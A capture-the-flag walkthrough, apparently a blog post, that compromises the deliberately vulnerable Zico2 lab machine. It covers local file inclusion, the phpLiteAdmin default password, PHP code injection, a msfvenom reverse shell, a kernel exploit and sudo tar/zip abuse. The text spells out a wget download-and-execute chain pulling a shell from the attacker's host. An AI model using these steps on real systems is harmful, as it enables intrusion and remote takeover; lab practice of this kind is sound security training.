ZICO 2
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfu1J5dXI1OxdLe-e1V03rXyKNtjI6ikGmTud7IJxKwYNFLYyT-UyV1jpmBr2GT6hare_1j_9DB3Hotcj1P1zMTgOm4XHkA4XO20ypMHtM6zAaSKbMoD8btvVRZA2WRuTnVDvdC383EKHN/s1600/screenshot.57.jpg)
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Zico2.
- Zico2 can be downloaded from here:
https://www.vulnhub.com/entry/zico2-1,210/
- Once downloaded and extracted with VMware:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh63bc4Pl5OVDzxUPv82RA7CkVMr6KMJXipdhuo9tdz2tAkVQ8fvsxzc5ErhWEnnkUrigjcchfWdbRRUC87PkIOmJ70YtBYCIfKX_GYmlRZQ1lsWQQcOHQOsn3v04p_-iHhHqoYb70XikES/s1600/screenshot.2.jpg)
2 - ENUMERATION
- Looking for zico2's IP:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVF5Br0MX-9rODlP9aAUH2HsfupoOc5D_prHSlXHJtBJ6loArdTifZ4AHaGLUgy2jLBLHc5Nhav3rs_jrV_mc-8Ho34vlUsNYnJg5oMuP6wcv-F6o0zxcF7w0-z2yE1szEGDZW_HW2APR/s1600/screenshot.27.jpg)
- Scanning with Nmap:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPehVXkueDYpZETfD6lRJPl3UUMj5JWnTtXU1s4iBdEuikbhgLIqNzOxlg30u9fCPeAm_ODWhGiXwGfEN9YCpAIaitEDXRYkGVYKnB3iUH6CHs6bRhbgWmRzzvV1u1KgO3_kGx4UThR44y/s1600/screenshot.28.jpg)
- Dirbusting the web server we find an interesting folder dbadmin:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyJcgQshn6tANgA4FyhvecravQhKzVmgnu9yU9Z5d-M4PeVzqWmA5Nwj8BqyKH0M2sfgeuRLJYoNZ2DJVNNOaDRplYkNl3xfmp0ge23IdCFzWiPbNRnRmsowW1PofSI_dIbBNt5Iaimpv2/s1600/screenshot.30.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGhExd-zjTt8vLhCIcZS2ZHSASAgUTXYLv2MpFaMZtgYIIM4HxXtU3aQ3czWm_UTgyFQuR0EBztdgrR7Is5XQx4fORlyS2bDrtlpcWWGEIf3RGE1WEpRLOeKoRO_IxbqNEIdMmDSJjy0ku/s1600/screenshot.31.jpg)
- Launching dirsearch.py we also discover a view.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0SKewBmBI7NxYww_4laT8n0to-cQjgoA5hF-SQiXw0JNt34h3hhvCJzDkf9Dp6eTUKD_RRxkqqNgwmr1DGthTd9T3vKt34EumDLOOtU9jTmUkUqVkLiQnX4j5SseO2gZANEBrKGKpaC_7/s1600/screenshot.59.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggvTO7izLcp2rbtJVIdGW4dFgZ5ZziblHHfmGYafEz75G5P92vYxZpFKkYgbyZaPHt8zJuGOnNlJpZagE1n2ssdGsJhEVPHD90MO5m7QUSRQEDZ7JMu2jrnjqo_mJ0fgkHrNc5cxHrGP7A/s1600/screenshot.60.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjICcgftd1l0FZbGlLbJpC5qx3cuBQZb9vBoKOwMizy6YQsiq5mGOTmm_4Ac-hLGwBX5zlhg9eX1M66nwzi55Pv2AdqMfnFTy-fj0-d71z-a4SILWaAWVLLj8ej8tI9ryCf_GTz7IIBLCu/s1600/screenshot.61.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjunQCOUO7hkyQwYWHj6OAVVWr5jszJndarNb6LzvFtFNdzd-YBSnej5CCUFLjMjTJd4k6SMkz4tDh5CC6oo1folmEVSdLB1HJq4XqlEc_ZcBg9VESGY7DHavIGdT09ZFsCOmbmkPkVgbGs/s1600/screenshot.63.jpg)
- Let's explore both view.php and /dbadmin.
- Connecting to the web server:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7E93G_d63v1EPWo-P3V8daBLQ30qj7ke6kzN4F9hD-9SxOvuA7xTNTBqs61IU7pA2VkGWAZ6-ZVuMv27MsNA8Ss8C3Jjr96p-p9-r4tLk-KoxSEiGllpWKMErnjs94VjAS_5XC4N9mEGN/s640/screenshot.32.jpg)
- Scrolling down and clicking about the "tools":
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuRejFiKJRTiJsL402wKWZ_pvHPfWUuliwh6ZliadpuVSng9tYu70hWUidg5C1TZOu1OlCveohiv-wcE-yUlbrDxA2qTIbGyZmJ2nKVFu_oZ-T9Ojosz-vn5Pi03Zjsi5jcTzD5vga-JAL/s640/screenshot.43.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqa8VMIx09IZvrLY6EZ0D2XnadASPUdlM1CwNaN4-7mR_Uw0esBkEwKwPEADE1YziGhyphenhyphenAY7hrdsGvCsypXK_vLd-SCdvIzlwC0EdwqvcyZ_e_Ab0zmA_cIK6UqNaf3d3OySgNBBX6kFNpG/s1600/screenshot.44.jpg)
- So view.php leads us to try a Local File Inclusion that can exploit a Directory Path Traversal:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKYiRyA85t-_b7YZD5qCgQoqn_OiUTQpSFpQP9cGDg8yJkuTaUJ8KxAMcU7br2we0Eo-SBfRDel3DwW8JJ8yHeywIXgiwGyAv0BPRZmjMDayjTTA8hChguZC_7WoztRrq88a0oxzqnKSfl/s1600/screenshot.45.jpg)
- Now it's time to explore dbadmin:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhpgL0eoueKIgwj58lYyqjayQ38ZcmwD_ls-Y-mzwqYXsYE-P2yGc924P3EJsCVDysY_sfxJDG9HLKMEXdNRPX0E5I4NF53rGBNmHNhLtVnbN2orouyF20JpBjKmqAdeYDkyz67IN2Slne/s1600/screenshot.33.jpg)
- Clicking test_db.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaN0juUuNoD7bymu8zdQxiFCvkiVZBKvnrSEQbY3IGCfvCj1jpyU4V02oUOzo33auBg88AVzkhD26Q-3oiDzacaAcsVhCgqrx4VLozv7CkepQQlwFPwV1JajDJPC401GC8ZsbVfQ2bi9_y/s1600/screenshot.34.jpg)
- Default password for phpLiteAdmin is admin:
https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPORTmziDCki1qLJOrzm-v0JKKAAcZvZoNIK_s12hHVLUCYuTG-oLNDvPIzzgw_lBEhEELWaQ-_HzNcE5Fv_qabmckjOskZ06C2yfty4SsMwLc_zcStSzXevqr_6voVsn1k2vb9c4H4cZ5/s1600/screenshot.35.jpg)
- It is possible to create new databases:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsvM-rRMxYj6eazK-M2b3iQ35-Yn_4wFP15sbjOgdDR7Tvq-pG1k-FLX0GitMyXNtSfE0-snLzMGbQRZv5ADfnWIHAO-HBV-IOSTGmkLQI5DWgsbVHD9Wjh4_PMTZpw0IfFeiAKakmBEy_/s1600/screenshot.58.jpg)
3 - EXPLOITATION - REMOTE PHP CODE INJECTION
- Looking for phpLiteAdmin vulnerabilities there is an exploit for Remote PHP Code Injection, what allows to inject code remotely to the server:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvpg4pOTt5SeTExXUssM3236WSZV2Lyjy_Y6XugSrva-Cc67wKjk6JzR0x5lm6txijH3TgqjOdMCLLBe1kwMKpR8t32alCRRWvoif0MXsf3DlBbBfLAjdw_aYGO_8rEm3ddZxxPuY9bAKM/s1600/screenshot.46.jpg)
- Reading the first lines of the 24044.txt exploit:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxrICOX8B94KqLDICxQg5s3yy8xA7XGtGEXtC8ZNPQK9pumYDJKbjzIfRaJbYUxZfo_wD1nw9oTM919ekpfVFY6_2dcs_egBfZ55ZE-Qb7u8Xbzobfo0Va2bmDmgUL9t-HSepIcK3tIcH/s1600/screenshot.48.jpg)
- Going to exploit-db:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj17uPxK1S_tpvE_-_ASB364SFApZvdsy0AvI-da4IW7oBOcYpyRp5Av47geNo2eop93eF4o9Z1g7VlrtkZ0O3ZgSBUQg7EQvsxpa-siufPTRWnbPgXB_bggpLckofCHNpYXHYaWePFfI4O/s1600/screenshot.49.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfBdwxNrRW7bV2huCprcCv_E_QOMa6u-ENFCI_J6-ZGzt3i-MvKYNnv_TANoLsi8W-Cxh90w-cdgSixyOcQbaynKbADEZECkYeGJ_7fyx7HK3tt6tK3GdVoGeJDYKNYZ2598dLdlxJw_iB/s640/screenshot.50.jpg)
- Following instructions let's create hack.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIZWcpFWqYM7mN58VNtTt48rQN4G1L0VowZY6ZHyO7BVW-ONdBxTSxPoRe1yDxXdRi-MC3J7YHYJiqkERDPU0wakLj40YEtezVgNcGq0VYk0CYoER4ETDXxwfMNJMPokvYJT-GKq_jMrb7/s400/screenshot.36.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDWooLe6jSHjpBZLt-7-5Ei-cN2uhHQhf-6_2bo-50wmMfxLQgwcvenQMxVqYpCnANz0MBjUGL_Bzt0WNbENakMaPDHzHqMWtkg2AA0kpF_H0koE6T4CRvJp3sSmJJovw7ZTfcJxtVuAoS/s400/screenshot.37.jpg)
- Adding a testing table prueba:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhajT5HjIWxIqcKAJ_4TEw1unrY4r343LOSK_nTTrFK9J-meLNlBwN5_1sLqm7dOViTdMEMWYYA7fEysnAPsKqlxqRjl_cK-iD1w54wyQwToaMMS_ksHUbDmn6UB798Z4359X1oEKZHduU7/s1600/screenshot.51.jpg)
- Entering the Default Value <?php phpinfo()?>:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglI1CvHiBN9o1poTO3kC8VKJjdgXI2F864MQBrR2By458ipluX1IO3yOYLQ87qoT9hn71-BgV03DbSrHxgTADGGhMSsN3wPGmrkKuB26zUPqRLB3UMvHTFvdGMXB9HNQzsxNxwoh1vxlWH/s1600/screenshot.52.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBRYyjGf4dsZAfUOMDUFIkw8raiHVTgrbR76MIM9JGBB3AhMqxmal94JRxZ-6mXOxVPGgS4YdRPNIRMolM3qrj9PbGKpfPIm-4b12kn9hl6bXVuUO2T0XzuFXGXtLcWUCrBMfsGfWlGjQm/s400/screenshot.53.jpg)
- Using the LFI from view.php we can successfully run the recently created database and check that the exploit works:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3ZQENDpTpkwC41Igg0Wwmj9LcaZN2inASg0Ub51E_FPhiRqG175OyyiKQQ3mfYfBm3U20oWpZp9Kh-9guJ2zH8Ag74ZuV8CaxpicorgUxbjcgY1P15yOD4RgnC9zP9V2opXCCyFpOA57e/s1600/screenshot.54.jpg)
- Why not taking advantage of this Remote PHP Code Injection exploit to upload a shellcode and spawn a reverse shellcode?
- msfvenom helps to create our shellcode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOoSRSg0QVdhFOqLHGMZzLhsgf5U1T-OPXVPEyNQeTsSDF5LD4wn3z80x9hFzUEiqHqC3NdKD8eK0RbobcT_h4Mr87Uo0kgg02fjRVKgZ-PB9Jr2lVvfSFyX-4feGlkb0ZksH2IV_eMJCb/s1600/screenshot.3.jpg)
- Giving execution permissions:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhycYLRxIxWusrfhAfh1SzMUoXf_TY3lz4YIL5z3K4J43wd1Fvr4qjuWYxC2cm-GhrXbIMsdMLsMQaPi4411lc2j8wHxzTvlPirR_7Lojyp6ZxiPbIOinAVvPEBBCt8lVFa7dJcHRkou2kd/s1600/screenshot.6.jpg)
- Setting a meterpreter session:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2lbkrHbL5hA2Qal84lnmS89rp19XnhcWX0ehT4t6LlNBORIVdxv5tJZ_1nx6ANWFXG8lEO-SIkifAJWv15UGAIf-k72P2Kf7o0ZMWTjSFYjgw0BUBeu1RKqKm5lbefrKyQ_Xoifq8hcsi/s1600/screenshot.5.jpg)
- Creating table 1 in database /usr/databases/hack.php:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmjMJOdJJq0Iid4aD7oOqL_1dzKvgO4fBaY7J7acCg1XrUthzsGDUGa6ByS4o_zh_SbuxvgJJ349jJyaNZOwVITuesOCnyUjm3JEDRgLYcMzHfEiVePwDEfaiozxuocu2246Ww3Dcybm_w/s1600/screenshot.38.jpg)
- Now, it is important to analyze in detail the Default Value to be entered at Field 1:
- system() -> executes an external program and displays the output
- cd /tmp -> changing to writable folder /tmp
- wget http://192.168.1.19:8000/myshell -> transferring the exploit from Kali to Zico2
- chmod 755 -> giving execution permissions to the exploit
- ./myshell -> running the exploit
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha63qqtsQuH0AYbovklrZE9QohOA-SIHTcm0NbIgp59TffGsJ_3VR4jmJ0yG48rXKOZBJTGNhDQ07oY3MhZTEdfJo8LAyNwMYp4oBs46az6KWS0zeHNEdmB0p1AfwMO4nafXEc2AQpzkjI/s1600/screenshot.39.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxC0iz2eNGHAygte7-7jODA0_hzNFkg4UEIZvuzkXW7UWFulvdgQtmAK1t0ClTucp2kO1dczytP_VWdKxzcq74H338ClVNmSqAxZ24mVodLCJW0mKqkVyN5pD2MAph1C8aYy0BXBf1cADG/s1600/screenshot.40.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGVpQNek4hLGwO4_SALvLPP1UttvMl-zO4t63epl9wbNs5GndGGk39OIze7BRKkUbuhw0G4vTJHBH3Em1BNiTIOpetpbnnXRPkRxY2IViUHYn3hY9AHs6YkuYYPcIH2F8NcbuiSWgOx8fb/s1600/screenshot.41.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYSDIqUU1wCNXbCK09OLZonYN7PtT2lai4ed4C47U0Bj5vvXz2FSScfLFbdSdmlkOLlTY6lyglSTy_h_ywYGSbRIDJwQffT-xrxkXE4xN1C4Bis7iCHSRTfLO6JlmJ9gKUKmAqjpvSrJAJ/s1600/screenshot.7.jpg)
- view.php? helps us to run the exploit remotely:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6b5CCUigwiAe3jfjN31rfrQxs_yM1LmwnlZ_nZCwdeBWSmH5Wv4lxrNeVWvoe8KjKBFypgN9hITVYP-hcQx905FqD7-21g5f7lZf4L1fJB1UFbNI_sEhc2tVHKF3fNaw0TxDOxN8YhGdZ/s1600/screenshot.8.jpg)
- As a consequence a meterpreter session is achieved:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQx4VUj-9PJCKKOHCLEtyG5OBLZxJ0NL2afk43sYCMj0VdD4xWhjHe0kDPzKly01VoyRj-K-drg4pgNXWnRxTz4DFxQiFuk9NCgZLhRjW_X-Kb5QjBjh2vQm5jzXOZn8Gm-S0vEB3zve8F/s1600/screenshot.12.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLVZffKYOCOYY2Ble7DzxKvJqt-K23hVVgiMaBqK7fCMZrWStLcRkzRxAvj0EceLHL4QUFMaxD-GzXEnaHGRNVChhJxUnnIuP0965tuuhVISom2GXSVV3AwYw7caEBHqe_ZerLxRBmBnc0/s1600/screenshot.13.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq1YAXm00vAcbqhm24-OqLxu_b2g6VJto4FKZO5wX1UeYB70Y6IdOW2MKsuCmnwvAhKE1MAFTzuPLpIK38exYZsTqfskxzpoUGNJmRE5eRWhGmHCk-AO7DIq0yaBEzY2tMdmgGYHFLuHvz/s1600/screenshot.14.jpg)
- Getting a shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1-ufXeWwlyyqTcdBtjVsYI2vpY3VNt0LgogYRaZDvYS1_grzH9CSzyIqgFFHYaUdcVeIhM85lY_KFI9wO77HpwtUsNesB8JdYZ8gOrUZdolI-uqvwud1hSP7c49oR-XkVxJZNtxbc9bgZ/s1600/screenshot.15.jpg)
4 - PRIVILEGE ESCALATION
- Improving the shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjOm21HEJkBaSc8pbgb7KXjoyk9FQWnz50zyJ3yqk3r7AF7tP4Bw4A0ioxtTWhnprfpdFNORGzMvBr07CW4bqtdGSVbL-T2E5lTGCymYez1afIakRYd_CdhnphC-EZUjHBTrxQADA3-PAK/s1600/screenshot.16.jpg)
- Let's explore two ways for Privilege Escalation:
4.1 - Kernel exploitation
- The kernel is vulnerable to this exploit, what allows Local Privilege Escalation:
www.exploit-db.com/exploits/33589
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0UmzRVzorzwz4Ue_NRjWr9o-LPXTqeO5M2zgA2TJa-6aA_D48-s9BkpK6g2QMNY3CrsXYuWI2mzCTFrSTcsS5Mbeyl8mRlJ1_hd1Ulh4v3AhGa9_GTkdUDWFRkfK5PXQ62xvP4iZ_tNoZ/s1600/screenshot.17.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2b7TDFTh6S3Jyro9bsUydj_AwPgGTk7ptrvk_vpK_0dmYAerSDQI-GblM7NcG2QRzE93c4WnlsQTJhZR7AlQ-HRPQWuL1JRnT17yxWgSlGp5pGAvnO5P7zavGSKHRErt3VwH76VleMNxi/s640/screenshot.18.jpg)
- Copy+Pasting the C program vnik.c to our local machine Kali:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCqnZOOhGPb7s1LXqEwxI0sn2iharm1JnphPbgBqMSq6asVCDoYiR61WMCu7mcfSyCgsBwTGBG1EvQaSlIMmvV2appyrk-tetCCUm3F35Y0h2oGwPeFH7fYWKWQ5EK6898-RApCQEUT0kJ/s400/screenshot.20.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGlXZGf57vy0ET_v126UJZXPcPkHQ257_uNT4oehJJcYPqF88ncRPa6CMrGS7yb965xpZINFbV0hcEtX4MNSD3w_ylad30cN8fJ5wtvUauq9s3t0Grpf8PpMB9ivYBa5WsQqhFIAk7CTUk/s1600/screenshot.21.jpg)
- Transferring vnik.c from Kali to Zico2:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLQbXjuXM8NP0RJxpvyLt8ziXrz5OKqGFKofWdzbLTy0B2dFPHFGzMjmCKSJYMaIO6lcu-7HFncB523U70aKhsYUpQscrKu2WpZ5FNLdDh87uwH8CGgj_sk5pz95XG_Bn0JMumw_FrC-A2/s1600/screenshot.22.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPCZlZhrKjg9KC0wuTIcn8agd0ozEn_VNVOnudsMCXieLax7oLafqAR_sAlJ8WIA7xNZo1X2ns782ZKX_iO3QljYWDgwb1UqrpupeMbc7sMTRYI4ffkbHg05xRqIOszkannsEqsxR0xX1K/s1600/screenshot.23.jpg)
- Compiling vnik.c according to the instructions:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixhHyzin8-EDkZAbj2sEaq7U2Nj5xfIT7ZWFrhrzRJv752iIafj7UlAFDWUMf95Xk2LPaF0LEOcgIV4QcM6yZgdXYM9i8yc2fOuFx5gE1xJ3_rA-9qmVs8iYjKidjptkHPwKGRGMaZy91D/s1600/screenshot.24.jpg)
- Running vnik a root shell is achieved:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx0B6h_zryjDthLgIJ6Y3-9Jf8UoUC07JDxPMEgHM2-7_0vfziTcA5fNNANvMaDQofQKQfHnSykTHCH_7YRHjCA0SQtOCDbrjDLjhOzOpjOvokNoB3aMH4xtHMvulJD9AxNME3KSXUmZi6/s1600/screenshot.25.jpg)
4.2 - Abusing tar and zip
- Listing /home/zico:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrvtD3uZaU1OP43VMv4REoZIZEKcvKpF_R2yfGfedEfbw-QO5rN7xD_Keeu8T2TQ3Iab-eRBFFi9raEoAGfJh2eIugsNdzSNsmXb0-mUPGrahC3JzuDqjcMiMJsQD96Pr2Cok3bUgZd9s4/s1600/screenshot.64.jpg)
- Going to /wordpress:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWFAnjjAJRo0U4e2Vxd-zwwcxPgb0bjnPvGP8vHLcQIFBukkBeCzS9vKT8pCQ0mP-DEnCFyj0lBdEqtwLGe65PBZCDWe2gmrHHxEmPNJayXJE3R9HRZlHjIXvpSWIFgj8Bf9pAswxMCNpf/s1600/screenshot.65.jpg)
- Reading wp-config.php we discover interesting credentials for user zico:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGeJ1p45OKah5W79x4mUu2bVEzbKs-HOWVGVx-vIt1mDo0kCHsaUJwUTDvsCYKH1TmJtM7lmRScKm7OXPfFk_gtuvRVRlB20W6iBTkAcYJeMexKnGne4laUIOKs5pxaI7A1Ue7G-5nuYYJ/s1600/screenshot.66.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNAKD8hW5p0tFJJQPFXoqOX0lfYNPbn3JaZLIj3Y7YQm85M01DbCWonAl5tqHpznptL8bdQ2iG8JGd0kM-f4E5oviDAuB_0LA4rcxGCjytyTcABcZpZWhpCnwqhcRg4mVN2oFYKLxiLAUa/s1600/screenshot.67.jpg)
- Using these credentials:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMFSjg21SURyFNYbj_u224jUDQ1vn-tGwq-VrHS0UY679XdPw3Tj4Ay_CXPkfuKzTBAA49AtzZvi1har30FFQyUp6cfvftrAksKktrvVAvbGLEcFIKzJJpqus5-qHX87qTDmQjB9aH_XIN/s1600/screenshot.68.jpg)
- zico is a sudoer able to run /bin/tar and /usr/bin/zip as a root:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVai5E4YJASkTuFzeNfhLsBCEGTw_azj8FPnubj1PrbLJlt4zzjS13eJcWw_CrhhxDk_BcADaU291OK5dY15VVAdch4__Y2c05lZa8D0MsD35BrR-cSRaGLfZqSmGxXLMJbcGZzz5toBJi/s1600/screenshot.69.jpg)
- tar and zip are able to run external commands supplied on the command line with the purpose of Privilege Escalation:
http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/
https://www.gnu.org/software/tar/manual/html_section/tar_29.html
- For instance tar can be used to spawn a root shell in this way:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikvq35XZe4bLkBG_wG3AprxlobyolTsDfehPu7kH5FRhhENC7pLyXeo-XgAb-tNXMwn_pAws-iIwMnRmIV7cqIYJ8ELMO9FcI0o8VlnjavOIsfzVx0lLRDZpAbKjddWxaW0Aom-23JGUxB/s1600/screenshot.72.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitYMoZsTCRQKo9Mq1pWtudVkufSOBWbQ47ygWHYSr_YEyGsp9MlP1VmFIyUBtjURqOpv1BO4kBpRjezozOOpdd8TRO4toDbb7crTM9wnQNn8J0UWBbzydaYPeLN8WpEeiG564k1gDmZ693/s1600/screenshot.73.jpg)
- In a similar way zip can be used to spawn a root shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHaQl121giuYuCz-DPR1pLxPG06PbFC04gRSgBpMieIXoKiThVvKM5sFLt88_SGymHLcHezCE7i1I8lyanr4yZveOCKneN9nxLS7tse-a2Itt77KZd0JG0ODGDxcVRinF7XXdRVbb_TJmf/s1600/screenshot.70.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRTi7cs8q8Mmx7vUfxZrkYYmhUYnFNAZicvXm0jrE3j1ek_JnE75ARisOOc3lYpzGzKpvqNDPbngBjsJaEq0dNdH7m3VkLuNO1ENcH_Wuu0bLFBpZPyvg5GAWmtIPeMYCZ8AY8M4QlVl-7/s1600/screenshot.71.jpg)
5 - CAPTURING THE FLAG
- Inside the /root folder we can read the file flag.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP6ZMZFDM0hq42NZf8YVYFY7u4Omi4R3FMAnxYoTNf_PVznPrUygM4zr0GZLVRwpqZAOQZBho2f5vPN3d-DeuUYyS5Z-hXQf4L-C4vJyd4A1xhKRWiqbLl99tgu9vDVDy2FAPpaeGN4qgT/s1600/screenshot.26.jpg)